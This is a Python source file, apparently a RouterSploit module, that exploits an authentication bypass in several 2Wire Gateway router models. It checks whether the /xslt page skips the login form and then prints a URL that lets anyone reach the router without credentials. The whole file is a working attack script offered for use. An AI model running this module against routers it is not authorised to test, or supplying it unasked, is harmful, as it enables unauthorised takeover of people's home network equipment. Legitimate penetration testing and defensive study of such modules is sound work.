import requests

from routersploit import (
    exploits,
    print_success,
    print_error,
    sanitize_url,
)


class Exploit(exploits.Exploit):
    """
    Exploit implementation for 2Wire Gateway devices Authentication Bypass vulnerability.
    If the target is vulnerable link to bypass authentication is provided"
    """
    __info__ = {
        'name': '2Wire Gateway Auth Bypass',
        'description': 'Module exploits 2Wire Gateway authentication bypass vulnerability. If the target is vulnerable link to bypass authentication is provided.',
        'authors': [
            'bugz',  # vulnerability discovery
            'Marcin Bury <marcin.bury[at]reverse-shell.com>',  # routersploit module
        ],
        'references': [
            'https://www.exploit-db.com/exploits/9459/',
        ],
        'targets': [
            '2Wire 2701HGV-W',
            '2Wire 3800HGV-B',
            '2Wire 3801HGV',
        ]
    }

    target = exploits.Option('', 'Target address e.g. http://192.168.1.1')  # target address
    port = exploits.Option(80, 'Target port')  # default port

    def run(self):
        if self.check():
            print_success("Target is vulnerable")
            print "\nUse your browser:"
            print "{}:{}/xslt".format(self.target, self.port)
        else:
            print_error("Target seems to be not vulnerable")

    def check(self):
        # check if it is valid target
        url = sanitize_url("{}:{}/".format(self.target, self.port))

        try:
            r = requests.get(url, verify=False)
            res = r.text
        except:
            return None

        if '<form name="pagepost" method="post" action="/xslt?PAGE=WRA01_POST&amp;NEXTPAGE=WRA01_POST" id="pagepost">' not in res:
            return False

        # checking if authentication can be baypassed
        url = sanitize_url("{}:{}/xslt".format(self.target, self.port))
        try:
            r = requests.get(url, verify=False)
            res = r.text
        except:
            return None

        if '<form name="pagepost" method="post" action="/xslt?PAGE=WRA01_POST&amp;NEXTPAGE=WRA01_POST" id="pagepost">' not in res:
            return True  # target vulnerable

        return False  # target not vulnerable
